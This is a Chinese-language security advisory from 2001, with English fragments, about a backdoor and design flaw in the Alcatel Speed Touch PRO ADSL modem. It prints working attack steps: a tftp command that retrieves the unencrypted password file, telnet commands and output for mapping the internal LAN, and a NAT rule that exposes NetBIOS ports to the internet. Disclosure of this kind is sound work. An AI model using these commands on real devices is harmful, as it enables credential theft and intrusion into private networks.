ALCATEL Speed Touch PRO 存在端口重定向漏洞

发布时间：2001-04-26
更新时间：2001-04-26
严重程度：高
威胁程度：其它
错误类型：设计错误
利用方式：服务器模式

受影响系统

ALCATEL Speed Touch PRO

详细描述
由于ALCATEL Speed Touch PRO 有后门和配置错误，可以使攻击者
远程拥有全部权利地访问ADSL，并且可以通过NAT/PAT对内部LAN进行攻击。
如果路由器是可以telnet的话就意味着"ip config firwalling"模式
是关闭的，在外部接口的IP接受INTERLNET连接，这样，攻击者可以通过
1-使用Shimomura Tsutomu的后门和2-使用tftp -i IPTARGET GET active/system.ini
读取没有加密的密码，这样就可以通过配置来对内部网络进行共享，如：

neuro@neuroneuro$ --> telnet router
Trying 192.168.0.1...
Connected to router.
Escape character is '^]'.
User :
SpeedTouch (00-90-D0-04-47-0D)
Password :
######----------------------------------------------------------------------

--
*
*                             ______
*                         ___/_____/\
*                        /         /\\ ALCATEL ADSL MODEM
*                  _____/__       /  \\
*                _/       /\_____/___ \   Version 3.2
*               //       /  \       /\ \
*       _______//_______/    \     / _\/______ Copyright 1999-2000.
*      /      / \       \    /    / /        /\
*   __/      /   \       \  /    / /        / _\__
*  / /      /     \_______\/    / /        / /   /\
* /_/______/___________________/ /________/ /___/  \
* \ \      \    ___________    \ \        \ \   \  /
*  \_\      \  /          /\    \ \        \ \___\/
*     \      \/          /  \    \ \        \  /
*      \_____/          /    \    \ \________\/
*           /__________/      \    \  /
*           \   _____  \      /_____\/
*            \ /    /\  \    /
*             /____/  \  \  /
*             \    \  /___\/
*              \____\/
*
-----------------------------------------------------------------------
=>ip
[ip]=>arplist
Intf         IP-address       HW-address          Type
eth0         192.168.0.2      00:00:b4:59:36:6c DYNAMIC
eth0         192.168.0.3      00:c0:26:ca:25:5e DYNAMIC
[ip]=>
It is even possible to check the routing table to learn the internal LAN
addressing.
The command is
[ip]=>rtlist
    Destination          Source           Gateway         Intf    Mtrc
    192.168.0.0/24    192.168.0.0/24     192.168.0.1      eth0   1
    192.168.0.1/32         0.0.0.0/0     192.168.0.1      eth0   0
   217.59.X.XXX/32         0.0.0.0/0    217.59.X.XXX      cip0   0
      127.0.0.1/32         0.0.0.0/0       127.0.0.1      loop   0
   217.59.X.XXX/30         0.0.0.0/0    217.59.X.XXX      cip0   1
    192.168.0.0/24         0.0.0.0/0     192.168.0.1      eth0   1
         0.0.0.0/0         0.0.0.0/0    217.59.X.XXX      cip0   1

这里可以ping启动着的机器：

[ip]=>:ip ping addr=192.168.0.2 count=10 size=100 interval=100 listen=off
108 bytes from 192.168.0.2: icmp_seq=0 time=2511 us
108 bytes from 192.168.0.2: icmp_seq=1 time=2337 us
108 bytes from 192.168.0.2: icmp_seq=2 time=2393 us
108 bytes from 192.168.0.2: icmp_seq=3 time=2314 us
108 bytes from 192.168.0.2: icmp_seq=4 time=2324 us
108 bytes from 192.168.0.2: icmp_seq=5 time=2333 us
108 bytes from 192.168.0.2: icmp_seq=6 time=2453 us
108 bytes from 192.168.0.2: icmp_seq=7 time=2350 us
108 bytes from 192.168.0.2: icmp_seq=8 time=2299 us
108 bytes from 192.168.0.2: icmp_seq=9 time=2353 us
我们可以利用NAT/PAT特征重定向端口137,138,139 TCP/UDP ，并把NETBIOS
资源直接映射到INTERNET上：
NAT>create protocol=tcp inside_addr=192.168.0.2:137 outside_addr=217.59.9.154:137

这样就可以通过\\ipdelrouteralcatel来共享内部网络资源。

测试代码
请见描述部分内容。

解决方案
尚无

相关信息
Stefano "NeURo" Chiccarelli
Metro Olografix Association
neuro@olografix.org
Chief security officer for:
- Studio Legale Monti
http://www.andreamonti.net
- Nuova Newtel s.r.l.
http://www.newtel.it

最近严重漏洞

ALCATEL Speed Touch PRO 存在端口重定向漏洞